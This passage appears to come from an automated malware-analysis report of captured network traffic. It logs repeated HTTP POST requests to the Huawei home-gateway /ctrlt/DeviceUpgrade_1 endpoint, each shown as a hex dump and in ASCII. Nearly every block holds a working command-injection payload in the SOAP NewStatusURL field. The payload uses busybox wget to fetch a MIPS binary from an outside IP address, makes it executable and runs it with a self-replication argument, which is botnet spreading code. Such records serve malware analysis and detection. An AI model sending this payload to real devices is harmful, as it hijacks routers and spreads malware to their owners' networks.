73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 